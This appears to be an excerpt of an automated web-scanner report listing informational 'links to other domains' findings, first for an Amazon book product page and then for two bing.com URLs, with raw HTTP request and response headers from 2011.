<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/1935182374/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 in Action" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0HRJE1J9WQNXJFNGE4NT&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIys9q0A9Y2eDUnFVWfBcWIckhsY7fiBXXF9Ka18wumsqXQ7JdEWL4eUx8gmc2rTqIRM0YxtcigQnzi4k2RfVzJ5IzUf12RhdYyqOb6l-BhuKt5TFYERVKQdEljJjd2p9jcJFqqFEcxuWmANRDeXdMEji9hNCaIHIcKjLaJdUT1X0G2MfRwGDm.c25G4v9-QCslHSShZRG-I9j61Ew1d03MFsFRsvlufLVRvp8eMUoVF3JdByDZdlMehVJo0Uq4pkZI24niChfWbDGAH1WJvAwBHwpsWxfjbiN1PXB.zEMPBr5G-vEomAY.vBvEVKD9fyiBl2dYmWij9fC1tQGtyl6yR9hPmg3skh8EcDiCzJM9lqb2qGfwohPYagQzrk2sM2eqaVEihMvMr9aYu0CUiICEaMXLEGErYnuxtbaMmX5bm9QYdmgZC5tanJt.m6dFDcl2VYhZ600.L0nJ2i8S7dyaRT-3d3EcSc6d8pDVZVWtC&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">intersystems.com/Cache</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALAUlv5bNpIbYQe3J19.jjAy9sNdZoAj8rNVvDHP8wVae6uI3sBadRGeUZN4zynEbk.eekvc9T4fMNnuLnYJb-wNoGgEjY75VQ0pQH43qk.bbc7FMJNdnhnJ0kLg95E.Du2ylJH.yyolih8Uii4ax9EZWc.oQgEOAP2AG48fVD2FtMEmkPTlCEmPARo4ffV3I6HSTz2Pf5ALmuzQPorvoZTMgxGDSZRn4yxw9Fts4fiIKnefj9t5If0qxlGModWxgsKxPtFFrH8HF.wgkjeRJp-aVvRtEH28ITundIndIvKlvJqRA2xyBxXapQlmVTCzFG4TJlLN-..Seyn1wUTtm0YHXWjnMQwcAbOz25QOS7TDNgKY99Bn-NfwVd4Ykt54hQ3OhOD4KxtQxXVq1f1UOWEevg14R1ki5nbPObDr4R9YyCjRJIDxHhkr7hQdPeNmJS3toNF1xTOgPHNOMUUwIjWoQd6200BkpsDN3h5.3VYInIF0AWKt9i8IYvhdEZKQvg__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.<b>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow">Microsoft <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AA1qj99DKyW8k0G4mJG87w5TPP3pGSgGNTg4jxiwP9PWWq-xETkOGxIniqvYu0f2BPxgowSyGJFHFDiQlx2ejilsjyCbt3UZ4FA9DPuA03gGsbHSV8sredGIE1Db2DdSfkl0aDJEGQ2UtiNuvUuxUtunhKb60IdGJs5Z8BigP6llgHfVJrbyVL2Yx0KpDufUybH9iFQgYipWjhDnJ6rFKyV2egWoTED8a7MChebCnt1iSdghRkcfPoZnhU5HnHJhxRaRQuzbKattoEAjYhGyMx7Nigt3Pw2cxjqy-Ncd3.RE4V3MafVLW2NVl2lN63WA.-yU.HUPQGou82sdudXTEIWGvPxm-R-4lTRNrEdRjSJUF0eK37rFMGzdVGI7ynWN265-m7.hSxUoWbPZVWJzwIKF7t5j6W4Qsd7ewKzgGthFJw8KYoNB1K.BYlJW7X9r1oIPS1MiO5f-KpvzneG4BoL4c0gI7WyQ347QuTVAUvDRYBZeIdiSBtsq03ZGhfzTSs4XtjDVaPgecXT5go6kdU0oZakCYDUCKq7cXHSzoBDAfyTF0qqxnTs_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">savenkeep.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=bxgy_cc_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 in Action" id="" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Programming-WCF-Services-Mastering-AppFabric/dp/0596805489/ref=bxgy_cc_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Programming WCF Services: Mastering WCF and the Azure AppFabric Service Bus" id="" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0672333368" ><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 Unleashed" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/187-0383633-5130955"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.379. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?FORM=MSNH14 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 28630
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:24 GMT
Connection: close
Set-Cookie: _SS=SID=66BC656690CE4D539DE7254734366E80; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8bdc9944b4474ed89a10284b3c1be756; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:23 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=SERP,70.1')">MSN</a> | </li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=SERP,72.1')">Hotmail</a>
...[SNIP]...
</h3><a href="http://www.discoverbing.com/get/set-bing-as-your-homepage-1?&amp;form=pgbar2" onmousedown="return si_T('&amp;ID=SERP,48.1')">Make Bing your homepage</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=SERP,82.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=SERP,84.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=SERP,86.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=SERP,88.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=SERP,90.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=SERP,92.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsathome&amp;P2=&amp;P3=0&amp;P4=MSNH14&amp;P5=F741A5D3C8544F77A0B57D8439E7E06E&amp;P6=Dallas%2c+Texas&amp;P7=Original&amp;P8=&amp;P9=32.8%2f-96.787&amp;P10=24902&amp;P11=&amp;P12=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=SERP,94.1')">Tell us what you think</a>
...[SNIP]...

22.380. http://www.bing.com/fd/fb/mulmfg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/mulmfg

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /fd/fb/mulmfg?IG=0cb67a41bf914cccaf15c0039ba2b9e7&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Fvideos%2Fbrowse HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/browse
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _UR=OMW=0; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
